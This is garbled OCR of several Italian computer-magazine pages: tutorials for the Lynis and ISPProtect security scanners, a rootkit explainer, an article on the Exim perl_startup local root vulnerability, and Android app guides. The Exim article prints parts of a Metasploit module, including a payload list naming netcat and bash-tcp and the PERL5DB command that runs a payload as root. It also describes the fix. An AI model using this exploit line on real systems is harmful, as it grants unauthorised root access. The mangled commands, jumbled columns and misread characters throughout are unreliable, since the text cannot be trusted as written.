Copyright 2007-2016 - CISOfy, https://cisofy.com/lynis/ 

Enterprise support and plugins allable via CISOfYy 
BRENBUBERBEREESSERZZZIZASEAGGIE "ilititiitttsoititititittiiiti iii ittici, 
[+] Inittalizing program 


Detecting 05... [ pone ]} 


SCANSIONE RAPIDA 
è 0 Come fatto con ChkRootkit, creiamo il link simboli- 
co con il comando sudo In -s /usr/local/lynis/lynis 
/usr/local/bin/lynis. Per eseguire una scansione alla ricerca 
di eventuali rootkit lanciamo sudo lynis --quick'ed attendiamo 
che il software ci fornisca un risultato. 


marlo@mario-VirtualBox: - 
R open logfile[]=/var/log/Xorg.0.log 
© Cerca nel computer e online 'auth. log 
oper grute] J=/var/ tog/cups/access_log 
open_logfile[]=/var/log/cups/error_log 
open_logfile[{]=/var/log/cups/page_log 
Î open_logfile[]=/var/log/kern.log 
open_logfile[]=/var/log/lightdm/lightdm. log 
open_logfile[]=/var/log/lightdm/x-0. log 
open_logfile[]=/var/log/syslog 
deleted_file[]=/home/mario/.cache/upstart/indicator-bluetooth, log.1 
deleted_file[]=/home/mario/.cache/upstart/indicator-sound.,log.1 
deleted_file[]=/home/marlo/.cache/upstart/unity-settings-daemon.log.1 
deleted _file[]=/home/mario/.cache/upstart/window-stack-bridge.log.1 
deleted_file[]=/tmp/#12247 
deleted_file[]=/tmp/tmpfGOx0tM 
deleted_file[]=/tmp/tmpfMEId5k 
deleted file[]=/tmp/tmpfQUdEHy 


LOG DI SCANSIONE 
4 Al termine della scansione, il software crea due file 
di log in /var/log/ (lynis.log e lynis-report.dat] con- 
tenenti informazioni di debuge il report delle operazioni effet- 
tuate, in modo da consultare più comodamente e senza fretta 
il risultato ottenuto. 


se support and plugins avalla 
WIAIISZEZZZNSZZNIS SISI TESINE SZSZSIRATESTCRIZAZICARISASESZIE 
[+] Intttalizing progran 


Detecting 05... 
Checking profile file (/usr/local/lynis/default.prf)... 
Program update status... 


[ pone ] 


D cp 


tynts 


aa 


Verstlon 
Status : o 
Release date : 2016-03 

Update location : https://cisofy.con/lynis/ 


Copyright 2907-2016 - CISOfy, https://cisofy.com/lynis) 


rio@narto-virtualBox:-S Ml 


SEMPRE AGGIORNATO! 

Cosa fare per mantenere sempre aggiornato Lynis? 

Basta lanciare da terminale il comando sudo lynis 
update info. Il software si occuperà di effettuare il controllo 
di versione e avviserà l'utente circa la presenza di eventuali 
aggiornamenti da scaricare ed installare. 


ess» 
3659 
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ADDIO AI MALWARE! 


Le potenzialità di ISPProtect sono notevoli. Il tutto è dovuto 
al fatto che usa ben tre motori di scanning. Uno è basato sulla 
firma dei file ed effettua la ricerca di eventuali malware sul 
sistema; un altro lancia una scansione euristica dei malware, 
andando a valutare anche eventuale software malevolo non 
ancora presente nel database; l'ultimo, invece, verifica le instal- 
lazioni obsolete sul sistema. La versione che abbiamo utilizzato 
per i nostri test è una trial: tuttavia ci permette di utilizzare 
tutte tutte le funzioni della versione completa per una prima 
scansione. Se dovessimo ritenere sufficientemente valido il 
software, possiamo acquistare una licenza direttamente dal sito 
Web ufficiale (/Attp://ispprotect.com/#buy). 


ta uLpenuenze 

.ettura informazioni sullo stato... Fatto 

seguenti pacchetti saranno {noltre installati: 

php5-readline 

acchetti suggeriti: 

php-pear 

seguenti pacchetti NUOVI saranno installati: 

phpS-cli phpS-readline 

aggiornati, 2 installati, 0 da rimuovere e 223 non aggior 

necessario scaricare 0 B/2.262 kB di archivi. 
opo quest'operazione, verranno occupati 9.491 kB di spaziof 
ontinuare? [S/n] s 
elezionato il pacchetto phpS-cli non precedentemente selezi 
Lettura del database... 177329 file e directory attualment@ 
reparativi per estrarre .../php5-cli_5.6.11+dfsg-1ubuntu3.8 
strazione di phpS-cli (5.6.11+dfsg-1ubuntu3.1)... 


INSTALLIAMO PHPS-CLI 

Avviamo il terminale ed otteniamo i privilegi di am- 
ministrazione (sudo -s). Uno dei requisiti per il cor- 
retto runzibafifionto di ISPProtect è l'installazione di PHP5-Cli: 
per avviarne l'installazione ci basta lanciare il comando apt-get 
install php5-cli. 


1-$ sudo chmod - 
1-$ cd /usr/local/ispprotect/ 
: /usr/local/ispprotect/: Permesso negato 
2-$ ls 
examples .desktop 
chkrootkit.tar.gz.1 Immagini Musica 
Documenti ynis lynis-2.2.0.tar.9z.1 Pubblid 
:-$ sudo cd /usr/local/ispprotect/ 
sudo: cd: comando non trovato 


local/ispprotect/ 

pprotect8 wget http://www.isppro 
--2016-04-04 02:2 6-- /www.ispprotect.com/download/isppsca 
Risoluzione di www.ispprotect.com (www.ispprotect.com)... +46.59. 
Connessione a www.ispprotect.com (www.ispprotect.com)|78.46.59,59|:£ 
Richiesta HTTP inviata, in attesa di risposta... 301 Moved Permanen®@ 
Posizione: http://ispprotect.com/download/isppscan.tar.9gz [segue] 
--2016-04-04 02:29:46-- http://ispprotect.com/download/isppscan.ta 
Risoluzione di ispprotect.com (ispprotect.com)... 78.,46,59,59 
Riutilizzo della connessione esistente a www.ispprotect.com:80. 


DOWNLOAD DEL TOOL... 

Cambiamo anche i permessi: chmod -R 750 /usr/lo- 
SET cal/ispprotect. Entriamo nella directory con cd /usr/ 

local/ispprotect e scarichiamo il software con il comando wget 

http://www.ispprotect.com/download/ispp_scan.tar.gz. 


0000 
DITO 
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COS'È UN ROOTKIT? — 
“Virus” è una definizione troppo generica 


I rootkit sono software malevoli in grado di eludere i sistemi di 
sicurezza e di operare attacchi verso il sistema operativo della 
vittima designata. In linea di massima, sono software che ri- 
siedono in zone abbastanza profonde del sistema. Fra gli scopi 
principali dei rootkit c'è il furto di dati sensibili. Agiscono o in 
user mode o in kernel mode: i primi si sostituiscono operativa- 
mente alle applicazioni; i secondi agiscono in modo molto più 
pericoloso avendo privilegi sul sistema (tuttavia, sono rari). 


A di phps- cli o 6.11+dfsg- lubuntu3. 1). 


a Selezionato il pacchetto phpS5-readline non precedente 


Preparativi per estrarre .../php5-readline_5.6.11+dfs 
Estrazione di phpS-readline (5.6.11+dfsg-1ubuntu3.1). 
Elaborazione dei trigger per man-db (2.7.4-1)... 
Configurazione di php5-cli (5.6.11+dfsg-1ubuntu3.1).. 
update-alternatives: viene usato /usr/bin/phpS per fo 
php5_invoke: Enable module json for cli SAPI 
phpS_invoke: Enable module pdo for cli SAPI 
php5_invoke: Enable module opcache for cli SAPI 
Configurazione di phpS5-readline (5.6.11+dfsg-1ubuntu36 
php5_invoke: Enable module readline for cli SAPI 

:-$ mkdir -p /usr/local/ispprot 


:2-$ sudo chown -R root:root /us 
Terminale 1-S 


Ma PERMESSI DI ROOT 

2 Per installare ISPProtect, invece, sarà necessario 
® qualche comando in più. Anzitutto creiamo una nuo- 
va cartella con il comando mkdir -p /usr/local/ispprotect e 
assegniamo ad essa l'utente root. Per farlo, digitiamo chown 
-R root:root /usr/local/ispprotect. 


root@mario-VirtualBox: /usr/local/ispprotect 


T :/usr/local/ispprotect# I 
pan 


si 
") 


s/usr/local/ispprotect# 2 


se«ED INSTALLAZIONE! 

Scompattiamo l'archivio (tar xzf ispp_scan.tar.gz) e 
rimuoviamo l'archivio compresso con rm -f ispp_ 
scan.tar.gz. Infine, con In -s /usr/local/ispprotect/ispp_scan / 
usr/local/bin/ispp_scan creiamo il link simbolico. 


Hai un malware nel sistema? Scoprilo subito! 


Scansioniamo l’intero OS e definiamo delle scansioni programmate per tenere al sicuro il web server 


Cerca nelcomputere online letti... Fatto 
Generazione aupero cette dipendenze 
Lettura informazioni sullo stato... Fatto 
Pacchetti suggeriti: 


clamav-docs 
seguenti pacchetti NUOVI saranno installati: 
clamav 
aggiornati, 1 installati, © da rimuovere e 223 non agg 
necessario scaricare 6 B/95,5 kB di archivi. 
Dopo quest'operazione, verranno occupati 752 kB di spazi 
Selezionato il pacchetto clamav non precedentemente sele 


SERVE ANCHE CLAMAV 
01 Il motore di scansione dei malware si appoggia al 
famoso antivirus ClamAV. Per installarlo, lancia- 
mo il comando sudo apt-get install clamav e, prima di lancia- 
re ISPProtect, attendiamo che il software venga scaricato 
e installato. 


E 
ue, 


| 
_-18 
Version 1.8.28 
(c) 2015-2016 by ISPConfig UG 


all rights reserved 


ionCube Check succeeded. 
Please enter scan key (or TRIAL if you have none, yet): TRIAL 
Please enter path to scan: 


TRIAL O LICENZA? 
03 Al termine della verifica degli aggiornamenti il 
software ci chiederà di inserire il codice della li- 
cenza. Scriviamo “trial” per avviare la nostra versione di 
prova gratuita. Se invece abbiamo acquistato una licenza, 
questo è il momento giusto per attivarla. 


Mediawiki => /usr/local/ispprotect/software_media 
Contao => /usr/local/ispprotect/software_contao_201604 
Magentocommerce => /usr/local/ispprotect/software_magen 
.txt 

Woltlab Burning Board 
20160404145114. txt 
Cms Made Simple => /usr/local/ispprotect/software_cms_m 
.txt 

Phpmyadmin => /fusr/local/ispprotect/software_phpmy 
Typo3 => /usr/local/ispprotect/software_typo3_2816848 
Roundcube => fusr/local/ispprotect/software_round 
Starting scan level 1 ... 

Scanning 1 files now ... 


=> /usr/local/ispprotect/softwa 


RISULTATI DELLA SCANSIONE 
0 Finalmente il software procederà a scansionare 
la cartella di destinazione e creerà di volta in vol- 
ta una lista dei file infetti rilevati. | risultati saranno inseriti 
nel file /usr/local/ispprotect/software_nomeservizio_data.txt 
e potremo consultarli al termine. 


# sudo apt-gé 


Selezionato il pacchetto clamav non precedentemente sel 
(Lettura del database... 177326 file e directory attual Ì 
Preparativi per estrarre .../clamav_0.98 dfsg-Gubuntu4_amd64 
Estrazione di clamav (0.98.7+dfsg-Bubuntus4).. 
Elaborazione dei trigger per man-db (2 

igurazione di clamav (08.98.7+dfsg-Gubi 


AVVIO DEL SOFTWARE 
È 02 ISPProtect è finalmente installato e per avviarlo 
basta lanciare da terminale il comando ispp_scan. 
Il software effettuerà automaticamente la scansione degli ag- 
giornamenti disponibili e, qualora ce ne fossero di disponibili, 
li proporrà all'utente. 


(c) 2015-2016 by ISPConfig UG 
all rights reserved 


ionCube Check succeeded. 
Please enter scan key (or TRIAL if you have none, yet): 
Please enter path to scan: /var/www/ 


SCELTA DEL PERCORSO 
04 Dopo aver inserito la licenza il software chiederà 
quale cartella scansionare. Questo percorso, può 
variare a seconda della distro in uso o delle configurazioni che 
abbiamo attuato sul nostro web server. Generalmente, la car- 
tella è /var/www. 


GNU nano 2.4.2 
Edit this file to introduce tasks to be run by cron. 
Each task to run has to be defined through a single li 


indicating with different fields when the task will be 
and what command to run for the task 


To define the time you can provide concrete values for 
minute (m), hour (h), day of month (dom), month (mon), 
and day of week (dow) or use '*' in these fields (for 

Notice that tasks will be started based on the cron's 

daemon's notion of time and timezones. 


SCANSIONE PIANIFICATA 
06 Eseguiamo il comando crontab -e e inseriamo la 
riga 03 *** root /usr/local/ispprotect/ispp_scan 
--update && /usr/local/ispprotect/ispp_scan --path=/var/www 
--email-results=indirizzofemail.ext --non-interactive --scan- 
key=TRIAL. 


ee 
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Hi. da esciakai 


n 


pete: ih a 


HACKING ZONE 


Ogni mese 
l’analisi 
dettagliata 

delle vulnerabilità 
più pericolose 

e le soluzioni 

più adatte 

per risolvere 

il problema 


Una mail e diventi root! 


Il software Exim, utilizzato su più della metà dei mail server del mondo per gestire 
i messaggi di posta elettronica, contiene un bug che permette ad un malintenzionato 
di ottenere i permessi di amministrazione del sistema 


a maggior parte degli utenti, quando pen- 
È sa ad Internet pensa unicamente al Web. 

Gli utenti più esperti sanno, però, che ci 
sono anche altri servizi che compongono la Rete. 
Ad esempio, il servizio di messaggistica e-mail. 
Il protocollo per l'invio di messaggi di posta elet- 
tronica è nato negli anni '80, ma la diffusione su 
grande scala si è avuta negli anni '90, con l'aumen- 
to delle velocità delle connessioni domestiche e la 
diminuzione dei costi degli apparati informatici. 
Naturalmente, il sistema e-mail non può funziona- 
re se non c'è qualcuno che invia i messaggi, tra- 
sferendoli da un computer ad un altro sfruttando il 
protocollo di comunicazione SMTP. Il capostipite 
dei programmi che svolgono questo compito, i co- 
siddetti MTA, è molto probabilmente Sendmail. 
Questo programma, rilasciato per la prima volta 
nel 1983 e tutt'ora sviluppato, ha segnato la sto- 
ria di Internet e delle telecomunicazioni, fungen- 
do anche da punto di riferimento per tutti gli altri 
programmi che lo hanno seguito. Tra di essi, uno 
spicca tra tutti: Exim. 


DAL PUNTO DI FORZA 
AL PUNTO DEBOLE 


Exim è un programma MTA ispirato a Sendmail, 
ma ha ottenuto rapidamente successo perché è 
semplice da utilizzare e altamente configurabile. Il 


ceco 
ceco 


ee 
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2:55 1B7mMg-8087t)-6x — fioctar@g?ntm W=roost P=local 
2.55 187eMc-0607t18-20 «— fissbhar@grntm U=root P=local 
12:55 187mMd0067t%-M: «= foctar@grnte U=rost P=local 
2-56 187mMe-0607tx-2f «= fostar@gintm U=root P=local 
2.56 157mMe_0007ta-D2 « fosttar@grntm U=root P=local 
2 


1 


9 
i 
n° 
n° 
n° 
° 
n° 
9, 
19 
19 
n° 
19 
9 


1 
1 
19 12.57 1B7mmr.0007tx-Ez <= foctar®gintm Usroot P=Rocal 


1B7HKg-0007gb-5Q <> L.IK 2m fostar@gintm |_ 


<> $ IX dm _barberCerirtrn 


56 1B7mMe-B067te-0D < fastar®gintm U=root P=local $ 


301305 delivering 187HMa-0)07n-GK: smaiting for a remote delivery a 
3I307 delivering 157HPla-007r-GK to pov.it [713.133.564 220] (Foot: 
- 157HMa-0007r-0e- =aiting for a rerrote delivery su 
157MMa-0007sr-Ce to pov.It [213.133.646 220] (focb 
IRTHEMINTTOLIT ine fe a rota Alia 


12.52 187mMa-6607sr-0e <= fiasttar@g?intm UW=root P=local S=248 
12.53 167mmb_00075y-SY — fiostar@gintm Wbsroot P=local S-M3 
12.53 187eMb_0007t2-Jq « fostaragintm U=root P=local S-333 
17 54 167eM-0667t17-8s « fisstrar@gintm lbsroot P=lLocal S-243 
12 54 187em.0007t8-sY — fostar@grnte Wsroot P=local S-Mu3 
12.54 1B7eMc-8987tF-LV « foctar@g?ntm U=root P=Local S-363 
1 
12 


Warning 


PO dernier pagg pinco 


The message(s) mill be rreversibiy deleted and no bounce 
messages will be sent. 


__E=d_e=| 


BI Fig. 1° Esistono delle interfacce grafiche che aiutano a gestire e configurare Exim 


successo di Exim è tale che ad oggi circa il 54% 
(ovvero più della metà) dei mail server del mondo 
funzionano grazie a questo software. Exim è ba- 
sato su una serie di parametri di configurazione, 
ed è costituito da un unico file eseguibile. Queste 
due caratteristiche, però, nascondono anche alcuni 
pericoli. Anzitutto, essendo un unico eseguibile, il 
programma deve poter cambiare in corso di esecu- 
zione i propri permessi: alcune operazioni devono 
essere svolte dall'utente root, mentre altre è consi- 
gliabile che vengano svolte soltanto da un utente 


semplice, per evitare possibili danni. Il programma 
riesce a farlo sfruttando il meccanismo setuid del 
kernel Linux, che viene utilizzato anche da altri 
software. Questo permette ad un eseguibile avvia- 
to senza privilegi di amministrazione di condurre 
alcune operazioni come root e poi tornare ai suoi 
privilegi originali. Il problema, ovviamente, è che 
se qualcuno riuscisse a far eseguire al program- 
mà qualcosa di diverso dal solito, magari qualche 
azione malevola, potrebbe addirittura fargliela fare 
con privilegi di root sfruttando proprio il setuid. 


BI Fig. 2 Nelcaso nonsi possa aggiornare 
Exim, è consigliabile modificare il file 

di configurazione rimuovendo la riga 
dedicata a perl_startup 


Ed è infatti accaduto più volte che alcuni pirati 
trovassero dei metodi di dirottare l'esecuzione di 
Exim a loro favore. Recentemente, si è scoperto 
un bug che permette di fare proprio questa cosa, 
sfruttando l'altro punto di forza del programma, 
che diventa in questo caso un punto debole: la con- 
figurazione. Già, perché un file di configurazione 
ricco di opzioni significa una notevole possibilità 
per un eventuale malintenzionato di mettere in dif- 
ficoltà il software stesso. Non solo: la possibilità di 
utilizzare Perl, ottimo strumento offerto da Exim 
per rendere il software adatto alle esigenze di 
chiunque, è una buona occasione per un pirata che 
vuole provare ad eseguire del codice malevolo. 
Per quanto riguarda il bug identificato nel mese di 
aprile, l'opzione vulnerabile era “perl_startup”: 
In questa opzione l'utente poteva specificare un file 
contenente le funzioni Perl (subroutine) che si vo- 
levano utilizzare. Il problema è che Exim leggeva 
il testo scritto per tale opzione senza verificare che 
non contenesse del codice pericoloso. Oltretutto, il 
problema è anche il fatto che non sia possibile in- 
dividuare automaticamente il codice malevolo: di 
fatto, ogni utente in grado di avviare il programma 
Exim (quindi ogni utente, visto che di solito non ci 
sono limiti) può eseguire dei comandi ed ottenere 
un terminale con privilegi di root. L'attacco non 
può essere effettuato da remoto, ma può essere 
utilizzato da un pirata per ottenere privilegi di root 
su un PC a cui ha accesso come utente semplice. 
Considerando che Exim è molto utilizzato, ad 
esempio, nelle reti universitarie e nelle reti azien- 
dali, magari su server LTSP, è ovvio che il pericolo 
che un utente qualsiasi ottenga privilegi di root e 
possa fare tutto ciò che vuole è piuttosto grave. 


L'EXPLOIT 


Il bug può essere testato contro una propria instal- 
lazione di Exim con la suite Metasploit. L'exploit 
da utilizzare si chiama exploit/unix/local/exim_ 
perl_startup. 


class MetasploitModule < 


Msf::Exploit::Local 


La classe in cui l'exploit risiede è Local. Infatti, 
come abbiamo specificato, la vulnerabile può es- 
sere sfruttata solo in locale per ottenere privilegi di 
root, e non da remoto. 


'Platform' => 'unix', 


'Arch' 


=> ARCH_CMD, 


La piattaforma per cui è progettato questo ex- 
ploit è Unix, considerato che Exim gira nati- 
vamente solo su questo tipo di sistemi (può 
funzionare anche su Windows con Cygwin, che 
però simula un sistema Unix). 
'SessionTypes' > %$w{shell 
meterpreter}, 
'Privileged' 
'Payload' 
'BadChars' 
27 anos 
'Compat' 
'PayloadType' 
cmd _ 
bash', 
'RequiredCmd' => 'generic 
netcat netcat-e bash-tcp telnet' 
} 
}. 


Viene scelto un payload di tipo meterpreter: si 
tratta del terminale di Metasploit, che permette 
non solo di ottenere una shell di sistema ma an- 
che ottenere facilmente informazioni e screenshot. 
Naturalmente in questo caso, visto che l'exploit 
è locale, poteva essere sufficiente una qualsiasi 
shell, ma Meterpreter è comunque più semplice 
da utilizzare ed è uno standard di Metasploit. Ven- 
gono proibiti i caratteri ' e “, ovvero gli apici ed i 
doppi apici, per evitare interruzioni nel comando 
che avvia Exim. 


'Targets' 

['Exim < 4.86.2', {}] 
Li, 
'DefaultTarget' 


Il target è, semplicemente, qualsiasi versione di 
Exim precedente alla 4.86.2: da essa in poi, infatti, 
il problema è stato risolto. 


def check 


if exploit ('whoami') 


CheckCode : :Vulnerable 


else 


CheckCode : : Safe 
end 


end 


La funzione check verifica se l'exploit sia andato a 
buon fine, e per farlo prima di tutto avvia la funzio- 
ne exploit, ordinandole di eseguire sul terminale 
che verrà ottenuto il comando whoami. Ovvia- 
mente, nel caso in cui l'output risulti essere “root”, 
significa che l'exploit ha effettivamente funzionato 
e che la nostra versione di Exim è vulnerabile. 


def exploit (c = payload.encoded) 
cemd_exec(%0{ PERL5OPT=-d 
PERL5DB='exec "#{c}"' exim -ps 2>&- 


La funzione exploit avvia l'interprete Perl di Exim, 
con l'opzione perlSdb, che indica la modalità di 
debug. L'interprete viene avviato eliminando l'ou- 
tput dei messaggi di errore (STDERR è rappre- 
sentato dal numero 2), che altrimenti sarebbero 
numerosi nella modalità di debug. 


LA SOLUZIONE 


Il nuovo aggiornamento di Exim ha risolto il 
problema aggiungendo altre opzioni nella confi- 
gurazione: keep_environment e add_environ- 
ment. Queste due opzioni permettono di conser- 
vare delle variabili d'ambiente oppure di crearne 
di nuove (o sovrascrivere quelle standard)., 

In questo modo si può di fatto separare l'ambien- 
te dell'interprete Perl di Exim dall'ambiente di un 
terminale normale. Naturalmente, la sicurezza 
sta nelle capacità dell'utente di configurare in 
modo sicuro le variabili d'ambiente: ad esempio, 
è sconsigliabile mantenere la variabile PATH. 
Inoltre, adesso Exim modifica, immediatamente 
dopo l'avvio, la cartella corrente a /, in modo da 
impedire l'utilizzo di file di configurazione ma- 
levoli scaricati in una cartella qualsiasi. Per lo 
stesso motivo, adesso il programma Exim può 
essere avviato soltanto se il file di configurazione 
viene specificato in modo assoluto e non relati- 
vo. Questo rappresenta una garanzia in più, per- 
ché rende più complicato l'avvio automatico del 
programma da parte di un malintenzionato che 
vuole soltanto ottenere un terminale con privilegi 
di root. Se per qualche motivo non potete aggior- 
nare Exim, vi conviene cancellare il contenuto 
dell'opzione perl_startup, in modo da impedire 
l'utilizzo di Perl. 
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CONTROLLA IL TUO 


GELLULARE DAL PG 


Grazie ad una semplice app puoi prendere il controllo dello smartphone 


Android direttamente dal computer 


ramente scomodo controllare sullo smartphone il contenuto di una 
nuova notifica o leggere l’ultimo SMS ricevuto. Peggio ancora se lo 
abbiamo lasciato sul comodino sotto carica, lontano dalla scrivania. Cosa 
possiamo fare? Molti di noi, soprattutto i più smanettoni, conosceranno 


| n ufficio 0 a casa, mentre stiamo utilizzando il PC, ci viene sicu- 


sicuramente AirDroid, storico programma per utilizzare lo smartphone 
direttamente dal PC. Una più che valida alternativa, molto matura e al- 
trettanto facile da usare, è però AirMore. Si tratta un software speculare 
che si differenzia per l’utilizzo di un'interfaccia molto semplice e veloce. 
Vediamo come usarlo per controllare il nostro dispositivo dal PC. 


AirMore: Android sul tuo PG 


Installare l'app è un gioco da ragazzi! Ecco come fare 


INSTALLIAMO 
01 Lapp 

Dal nostro di- 
spositivo Android connes- 
so a Internet (tramite la 
rete mobile o un hotspot 
Wi-Fi) accediamo al Play 
Store. Tramite il pulsante 
a forma di lente di ingran- 
dimento cerchiamo l'app 
AirMore. Apriamo la rela- 
tiva scheda e installiamo 
l'applicazione che, ovvia- 


È 
È 
È 
È 
É 
È 


Pochi secondi e accediamo automaticamente alla scher- 

mata principale di AirMore. La cosa che salta subito 
all'occhio è la pulizia: sulla sinistra troviamo le icone con le funzio- 
nalità, al centro le informazioni sul dispositivo collegato. 


ce 
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SERVE UN 
02 copiceor 

Ora che l'app è 
installata, dal nostro PC 
apriamo apriamo il brow- 
ser che preferiamo e rag- 
giungiamo la pagina Web 
airmore.com/web. Tornia- 
mo allo smartphone e, una 
volta avviata l'applicazio- 
ne, tappiamo Scannerizza- 
re QR così da inquadrare 
il codice visualizzato sul 
monitor del computer. 


A 
192.168.1.68 
Sto richiedendo la connessione 


mn 


AEVIENITINA PETTFITTTANNIMIENTI ATI TEMA 


a ML _____ 


IN DIRETTA SU ANDROID 

Una delle funzionalità più gradite è la visualizzazione del 

display dello smartphone direttamente in una finestra 
del PC. Dall'interfaccia principale di AirMore clicchiamo sull'icona 
Riflettore e sullo smartphone diamo poi conferma del mirroring. 


Come uno smartphone, ma sul computer! 


Scopriamo come gestire foto, documenti e file dello smartphone direttamente dal PC 


Immagini ID ER 


Caricare file Caricare cartella 


O Le mie Foto 0/0 


FOTO A PORTATA DI CLIC 

Dalla sezione laterale che troviamo sulla sini- 

stra, toccando sull'icona Foto avremo pieno ac- 
cesso alla relativa cartella del nostro telefono. A questo 


punto potremo non solo visualizzarle, ma anche cancel- 
larle o scaricarle direttamente sul computer. 


A ni 1a: ist 
Wir eee 
Ri. i 204 Attore = a, ano 

br] ig 39000 PRETI sore ma 
bd s 

drei A rd Gir Avvio spie. vireto. 
8 

monti AZ cane Pai e 
(a) 
O — B=- na E de 


GESTIONE DELLE APP 

Da App accediamo a una completa libreria conte- 

nente tutte le applicazioni installate nel device. 
Possiamo non solo installare a mano eventuali file .apk, ma 


anche disinstallare le app di sistema (ma solo se abbiamo ef- 
fettuato il root sul dispositivo). 


A 
> 
(O) Nome 0/2 


AN C 
ZIP 
: I 


Documenti T i 


Caricare file Caricare cartella 


*) EJ voice_instructions.zip 


O El it-m-v200-M9zip 


CONDIVISIONI LAMPO! 

Una facilitazione della precedente sezione è la 

scheda Documenti. Qualunque file, siano essi do- 
cumenti office o archivi compressi (ad esempio gli allegati 


delle e-mail), si può scaricare sul computer o caricare diret- 
tamente sul dispositivo mobile. 


Messaggi 


Nome 0/3 


TIM cs) 03-26 C2a13 
“© avoltena esclusiva che U aspetta? Per scooriria chiama subito 6 40936 


sm 40N6 osi 1es7 
€ qa Cambiano le consizoni ecunomiche dei tuo prufito base a partire del 0/t.con 
6 demtati 6 materie cere 


03-08 #20 


configurato correttamente Coca tu 


“TI RISPONDO DAL PC” 

SMS e MMS sono sempre a portata di mouse: 

nella sezione Messaggi si può interagire con i 
messaggi di testo ricevuti e inviati, proprio come sul te- 


lefono. Possiamo anche salvarli sul PC ed effettuare un 
comodo backup (che male non fal). 


TUTTO SOTTO CONTROLLO 

Qualora volessimo fare un po' di pulizia nella-me- 

moria del telefono, ci verrà in aiuto la sezione File 
dalla quale avremo pieno accesso al file system. Attenzione 


però: la modifica o la cancellazione di file di sistema potrebbe 
causare grossi problemi. 


Strumenti 


O & a &« 


Gestore telefono =— Registratore audio Regrtratore schermo Convertitore video — Video Dommicader istantanea Schermo 


x 


TOOL EXTRA 

Strumenti è una comoda utility che gli sviluppatori 

di AirMore ci mettono a disposizione. Possiamo così 
utilizzare Web app esterne per convertire filmati nel formato 


che desideriamo, scaricare video dai principali siti Internet e 
tanto altro ancora. 
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TELEFONA GRATIS 
IN TUTTO IL MONDO 


Una nuova app Android permette di chiamare senza spese anche a chi non è 
connesso alla Rete, compresi i numeri fissi. Ecco come funziona 


Fino telefonate via Internet non è certo una novità, ‘Grande Rete. Quindi, anche i numeri fissi e mobili privi di con- 


tanto meno dal cellulare: ci siamo accostati a questa tec- nessione. Solo chi chiama deve essere connesso! Potremo così 

nologia con Skype e poi è diventata norma sullo smart- sentire senza costi di alcun tipo, contattare i parenti oltreoceano o 
phone con WhatsApp, Viber e tante altre app. Aznog, però, hauna gli amici in giro per il mondo. L’unica limitazione è sulla durata 
particolarità: consente di telefonare via Internet in tutto il mondo delle telefonate, solo 2 minuti. Nulla però vieta, alla scadenza del 
in modo assolutamente gratuito anche a chi non è connesso alla tempo, di ritelefonare e continuare a parlare. 


Un'app ed hai smesso di ricaricare il credito 


Ecco come installare Aznog sul tuo smartphone Android ed effettuare la prima chiamata gratuita 


SETUP DELL'APP | REGISTRIAMOCI 
Verifichiamo che Avviamo l'appli- 
lo smartphone cazione appena 


Android sia connesso a installata. Nella schermata 
Internet (tramite la rete iniziale troviamo il logo 
36/4G o un hotspot Wi-Fi) dell’app e un campo: è qui 
accediamo al Play Store e che dobbiamo inserire il no- 
cerchiamo Aznog. Tappia- stro numero di telefono per 
mo poi sul pulsante Instal- iscriverci al servizio Aznog. 
la e successivamente su Digitiamo quindi il nostro 
numero di telefono, verifi- 


[»| 
[>| Google Play 


amate gratuite 
AZNOG TECHNOLOGIES LIMITED È 


INSTALLA 


+39 Phone Number 
| 
| 


o-erocnsto 


desde 19900 aa 22 feb 2016 
È 


100.000+ download i+ 19,92 MB 


Descrizione ca Accetto. In pochi secondi 

Fai chiamate illimitate e gratuite a chiunque in | l applicazione verra REATO | © chiamo che nel mani sopra 
Italia e in più di 26 Paesi nel mondo.  catae installata sul device. di esso sia selezionata la 
Sata late storasena crm | Al termine dell'operazione, vusicaziionee voce Italia e tappiamo sulla 


Ao RZITIALIUAGALIALALASAGGAAGIANIAMABUGSALGIANI MOZILLA UIGGIUZAIATOITGLITILCAISGAGIIICAZOIMOLIAsaGGGALAINALIAAOI 


Terms & Privacy Policy. 


—=rnenz—— 


avviamo l'app. freccia verde di fianco. 


I 


LA VERIFICA a gn E CONTATTI 
Il servizio ci invie- pai : 04 E NUMERI 
Please wait and do notleave the 3 


pa rà un messaggio CONTACTS In pochi secondi 
00:09 ——____ym__ SMS per verificare che il rp l'app importa i nostri con- 
numero inserito sia effetti- tatti presenti nella rubri- 
@ vamente il nostro: appena ca telefonica del device 
n 10 riceveremo il sistema pre Android: nel tab CONTACTS 
Ja ; lo rileverà in automatico Andri troveremo tutti i numeri 


We sent you an SMS to the 
number 


+39 349 


y 
tAAlaza SAL VAMALIALLA MAI 


Andrea 


SIMMAMAALILILaidAiLà 


Please take few moments to set up your { 


AMMIPIPI III TAI TIPITITI ere Ivar IrePEm teme rertTenet entre topi mntent tenti 


profile ° copiandolo nell'apposito Sgt ® salvati. Basta tappare su 
H spazio. Da questo momen- uno di essi per chiamarlo 
$i Your gender —_ to in poi siamo iscritti al ita ® gratuitamente (non impor- 
ESSE servizio. Nella schermata Angela ® ta se è iscritto ad Aznogo 
(7a) Your birthdate seguente inseriamo gli altri Angela ® meno). Toccando DIALER 
i dettagli personali richiesti ue ® potremmo comporre ma- 
Î e proseguiamo. nualmente un numero. 


Coscioni 


| 


se 
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FAI IL PIENO 


DI SFONDI E SUONERIE! 


Migliaia di wallpaper, musiche e giochi gratuiti sono pronti per essere 
scaricati: ecco le app definitive che te li mettono tutti a disposizione 


da almeno un anno, ci ha stancato? Così come la suoneria 
che non abbiamo mai cambiato fin dall'acquisto del telefo- 
nino? Beh, se la risposta a questi quesiti è positiva, non abbiamo 
grosse scelte: è arrivato il momento di dare una rinfrescata al look 
del nostro prezioso smartphone, scegliendo uno sfondo ed una suo- 


I o sfondo del nostro smartphone Android, magari identico 


“Di che sfondo sei?” 


neria all'ultimo grido. Sul Play Store ci sono decine e decine di ap- 
plicazioni che fanno al caso nostro. Noi abbiamo deciso di puntare 
i riflettori su due delle soluzioni più rapide, complete e gratuite che 
ci permetteranno di dare un tocco personale al nostro telefonino. 
Cos'altro aspettiamo? Rimbocchiamoci subito le maniche e che la 
personalizzazione abbia inizio! 


Scarica subito l'app perfetta per trovare il wallpaper che fa al caso tuo 


LA GIUSTA APP 
Dal nostro smar- 
tphone o tablet 

Android connesso a 

Internet (tramite la rete 

mobile o una connessione 

wireless), accediamo al 

Play Store e da qui ricer- 

chiamo l'app (rigorosa- 

mente gratuita) Sfondi HD 

(Backgrounds HD). Come 

al solito, tappiamo sul 

pulsante Installa ed at- 
tendiamo che il download 
dell'app venga completato. 


RICERCA 
